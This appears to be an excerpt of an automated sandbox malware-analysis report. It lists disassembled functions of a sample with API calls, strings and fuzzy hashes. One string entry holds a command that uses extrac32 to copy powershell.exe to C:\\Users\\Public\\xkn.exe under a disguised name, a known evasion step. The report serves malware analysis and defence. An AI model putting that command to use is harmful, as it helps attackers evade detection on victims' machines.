                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: memset$ErrorLast$InformationVolume
                                                                                                                    • String ID: %04X-%04X$~
                                                                                                                    • API String ID: 2748242238-2468825380
                                                                                                                    • Opcode ID: 6140927c712726b5ce6b5c6052370d277af7610c6653376c5bf883b173b19ee6
                                                                                                                    • Instruction ID: 81323735a53d38904496eff4a97faeb927f6c80911cd958a6efe76932b8e4485
                                                                                                                    • Opcode Fuzzy Hash: 6140927c712726b5ce6b5c6052370d277af7610c6653376c5bf883b173b19ee6
                                                                                                                    • Instruction Fuzzy Hash: 04A1B632708BC58AEB25AF21D8402E9BBB1FB85B86F908035D94D0BB59EF3CD605C710
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BD662C Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 170COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: iswdigit$_errnoiswalphawcschrwcstol
                                                                                                                    • String ID: +-~!$APerformUnaryOperation: '%c'
                                                                                                                    • API String ID: 2348642995-441775793
                                                                                                                    • Opcode ID: 3043d5b8b3736d8e68c05dd1a897401147fff5d71c47df5c8b899d9aaf2ce369
                                                                                                                    • Instruction ID: e0ffeab5e23f611bdaec064cabd414c1e91449732b3c622d12e21bab0db80ec3
                                                                                                                    • Opcode Fuzzy Hash: 3043d5b8b3736d8e68c05dd1a897401147fff5d71c47df5c8b899d9aaf2ce369
                                                                                                                    • Instruction Fuzzy Hash: A2714C66908A4EC6E7606F25D458179FBB0FB49F86BA4D031FA4E07294EF3CA584C721
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BC9400 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 161COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: memset$ErrorInformationLastVolume_wcsicmptowupper
                                                                                                                    • String ID: FAT$~
                                                                                                                    • API String ID: 2238823677-1832570214
                                                                                                                    • Opcode ID: 31d5b5f442e73b16389405a1f8f1aa1cf1f987a59b4b054618f08dfe6adbd7a2
                                                                                                                    • Instruction ID: 10361289db565988b95963b3c50e796af931ba634445a1ff057d7485720759a1
                                                                                                                    • Opcode Fuzzy Hash: 31d5b5f442e73b16389405a1f8f1aa1cf1f987a59b4b054618f08dfe6adbd7a2
                                                                                                                    • Instruction Fuzzy Hash: EA718232608BC5CAEB61DF21D8542E9BBB0FB85B8AF904435DA4D4BB58DF38D245C710
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BCD840 Relevance: 18.4, APIs: 12, Instructions: 444memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF789BCFE2A), ref: 00007FF789BCD884
                                                                                                                    • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF789BCFE2A), ref: 00007FF789BCD89D
                                                                                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF789BCFE2A), ref: 00007FF789BCD94D
                                                                                                                    • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF789BCFE2A), ref: 00007FF789BCD964
                                                                                                                    • _wcsnicmp.MSVCRT ref: 00007FF789BCDB89
                                                                                                                    • wcstol.MSVCRT ref: 00007FF789BCDBDF
                                                                                                                    • wcstol.MSVCRT ref: 00007FF789BCDC63
                                                                                                                    • memmove.MSVCRT ref: 00007FF789BCDD33
                                                                                                                    • memmove.MSVCRT ref: 00007FF789BCDE9A
                                                                                                                    • longjmp.MSVCRT(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF789BCFE2A), ref: 00007FF789BCDF1F
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Heap$AllocProcessmemmovewcstol$_wcsnicmplongjmp
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1051989028-0
                                                                                                                    • Opcode ID: 64565f03666b4bb772596797247e6bb6fdde89d50adaa5f7e3853eb5f84ddd48
                                                                                                                    • Instruction ID: 620fe1f0481a802bde5db5a133ae808c5e8271b5605cae52275d4ae6e282a1b9
                                                                                                                    • Opcode Fuzzy Hash: 64565f03666b4bb772596797247e6bb6fdde89d50adaa5f7e3853eb5f84ddd48
                                                                                                                    • Instruction Fuzzy Hash: 0E028576A0978981EB346F15E44027AFAB4FB84FAAFA54131DA8D07B94DF3CE441C710
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BC86B0 Relevance: 18.1, APIs: 8, Strings: 4, Instructions: 138memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Heap$_wcsicmp$AllocProcess
                                                                                                                    • String ID: DISABLEDELAYEDEXPANSION$DISABLEEXTENSIONS$ENABLEDELAYEDEXPANSION$ENABLEEXTENSIONS
                                                                                                                    • API String ID: 3223794493-3086019870
                                                                                                                    • Opcode ID: d222a0f06bbbc582554831b5995f9d518337be47592992ae4180831db5f06540
                                                                                                                    • Instruction ID: 7a4f48906e7680afa63cd558767df5f8d03962b7ec9396b60b2650650457d675
                                                                                                                    • Opcode Fuzzy Hash: d222a0f06bbbc582554831b5995f9d518337be47592992ae4180831db5f06540
                                                                                                                    • Instruction Fuzzy Hash: D1517025A0874686FA54AF25E414179BFB0FF49FA6FA85135CA1E077A0EF3DE441C720
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BEBFEC Relevance: 17.9, APIs: 3, Strings: 7, Instructions: 444COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00007FF789BD58E4: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00007FF789BEC6DB), ref: 00007FF789BD58EF
                                                                                                                      • Part of subcall function 00007FF789BD081C: GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF789BD084E
                                                                                                                    • towupper.MSVCRT ref: 00007FF789BEC1C9
                                                                                                                    • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF789BEC31C
                                                                                                                    • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0 ref: 00007FF789BEC5CB
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CriticalDriveEnterEnvironmentFreeLocalSectionTypeVariabletowupper
                                                                                                                    • String ID: %s $%s>$PROMPT$Unknown$\$extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe $x
                                                                                                                    • API String ID: 2242554020-3085501545
                                                                                                                    • Opcode ID: 4a922d4c85f00677817b5c761d16b1de45b4041caf2284929607811bb1d70d1e
                                                                                                                    • Instruction ID: acd80c84ed447d8ce8093471f08e560017477ad26b6d883fd0ea6b3999c3f124
                                                                                                                    • Opcode Fuzzy Hash: 4a922d4c85f00677817b5c761d16b1de45b4041caf2284929607811bb1d70d1e
                                                                                                                    • Instruction Fuzzy Hash: A0129221A1864A81EA60BF25A80417EEBB4FF44FA6FE45235D95E037E0DF3DE941C724
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BD6FB4 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 148COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$AttributesFindmemset$CloseDriveErrorFirstFullLastNamePathTypewcschrwcsncmpwcsstr
                                                                                                                    • String ID: \\.\
                                                                                                                    • API String ID: 799470305-2900601889
                                                                                                                    • Opcode ID: 7ea5b237473074eb8a3c93ab886d3958f76363502f2a90bc42476f967ba8e34b
                                                                                                                    • Instruction ID: 7d4a9dae0f473802c2367fec0bc2624c985a7c7b6a0e1277e4d02361d849760c
                                                                                                                    • Opcode Fuzzy Hash: 7ea5b237473074eb8a3c93ab886d3958f76363502f2a90bc42476f967ba8e34b
                                                                                                                    • Instruction Fuzzy Hash: C751A532A18A8A89EB60AF11A8442F9BBB0FF85F96FA54535DA0D07794DF3CD545C320
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BC8B20 Relevance: 16.8, APIs: 11, Instructions: 254COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcsicmpwcschr$AttributesErrorFileLastwcsrchr
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1944892715-0
                                                                                                                    • Opcode ID: b04fd89d1b32d74b41568e07ffd85bc9ccdf1354646f06c8d836b15a263e4c9a
                                                                                                                    • Instruction ID: ea63864cdbf43b2a0a6f4a54a247be4dcaaf62a3fe3ac2100aac10eb250a482f
                                                                                                                    • Opcode Fuzzy Hash: b04fd89d1b32d74b41568e07ffd85bc9ccdf1354646f06c8d836b15a263e4c9a
                                                                                                                    • Instruction Fuzzy Hash: EBB16021A0964A86EA64BF11A454179FEB0FF95FA7FE48439CA4E47791EF3CE440C720
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BC5458 Relevance: 16.7, APIs: 11, Instructions: 213fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00007FF789BD3578: _get_osfhandle.MSVCRT ref: 00007FF789BD3584
                                                                                                                      • Part of subcall function 00007FF789BD3578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF789BC32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF789BD359C
                                                                                                                      • Part of subcall function 00007FF789BD3578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF789BC32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF789BD35C3
                                                                                                                      • Part of subcall function 00007FF789BD3578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF789BC32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF789BD35D9
                                                                                                                      • Part of subcall function 00007FF789BD3578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF789BC32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF789BD35ED
                                                                                                                      • Part of subcall function 00007FF789BD3578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF789BC32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF789BD3602
                                                                                                                    • _get_osfhandle.MSVCRT ref: 00007FF789BC54DE
                                                                                                                    • WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(?,?,00007FF789BC1F7D), ref: 00007FF789BC552B
                                                                                                                    • WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00007FF789BC1F7D), ref: 00007FF789BC554F
                                                                                                                    • _get_osfhandle.MSVCRT ref: 00007FF789BE345F
                                                                                                                    • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00007FF789BC1F7D), ref: 00007FF789BE347E
                                                                                                                    • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00007FF789BC1F7D), ref: 00007FF789BE34C3
                                                                                                                    • _get_osfhandle.MSVCRT ref: 00007FF789BE34DB
                                                                                                                    • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00007FF789BC1F7D), ref: 00007FF789BE34FA
                                                                                                                      • Part of subcall function 00007FF789BD36EC: _get_osfhandle.MSVCRT ref: 00007FF789BD3715
                                                                                                                      • Part of subcall function 00007FF789BD36EC: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF789BD3770
                                                                                                                      • Part of subcall function 00007FF789BD36EC: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF789BD3791
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _get_osfhandle$ConsoleWrite$File$ByteCharLockModeMultiSharedWide$AcquireHandleReleaseTypewcschr
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1356649289-0
                                                                                                                    • Opcode ID: 8cb344cfa4787b055339b8a9ee12bbc5c0a371722c2d9f6503a0875dc2cc5f96
                                                                                                                    • Instruction ID: ae1d17771738e61ca2a0b7b6200fa4eddbea41148d7f1a74604fc63e96c6ab9a
                                                                                                                    • Opcode Fuzzy Hash: 8cb344cfa4787b055339b8a9ee12bbc5c0a371722c2d9f6503a0875dc2cc5f96
                                                                                                                    • Instruction Fuzzy Hash: C8915F32A0864A97EA14AF25A40417DFBF5FB89F96FA44139DA4E43795DF3CE440CB10
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BE86FC Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 226timeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: LocalTime$ErrorLast_get_osfhandle
                                                                                                                    • String ID: %s$/-.$:
                                                                                                                    • API String ID: 1644023181-879152773
                                                                                                                    • Opcode ID: 52adc4b69c0d6b0cc37f226843e3bc06c06473f0745bac629c27b33a4c267472
                                                                                                                    • Instruction ID: 4764e5d2ba008fde952baebc2dfd97bddb6c85fe70738d9461bcd208d9c46411
                                                                                                                    • Opcode Fuzzy Hash: 52adc4b69c0d6b0cc37f226843e3bc06c06473f0745bac629c27b33a4c267472
                                                                                                                    • Instruction Fuzzy Hash: 0A91B062A08A4E91EF50AF60D4442BEEBB4FF84F96FE44135DA4E426D4EE3CE545C720
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BE627C Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 95synchronizationCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF789BE7251), ref: 00007FF789BE628E
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ObjectSingleWait
                                                                                                                    • String ID: wil
                                                                                                                    • API String ID: 24740636-1589926490
                                                                                                                    • Opcode ID: ea3b1f99615cb6da41309659edc9fe07f1318ac417b21432a0effa90e1671882
                                                                                                                    • Instruction ID: d8b0549a18cb4b3e97e94c7229933dc549111150a9124726dece50ec1bbe8ef1
                                                                                                                    • Opcode Fuzzy Hash: ea3b1f99615cb6da41309659edc9fe07f1318ac417b21432a0effa90e1671882
                                                                                                                    • Instruction Fuzzy Hash: 05414E21A0854AC3F3206F15E40427DAEB5FF85F92FB08131E90A87A94DF3DE844C621
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BECDC0 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 94windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
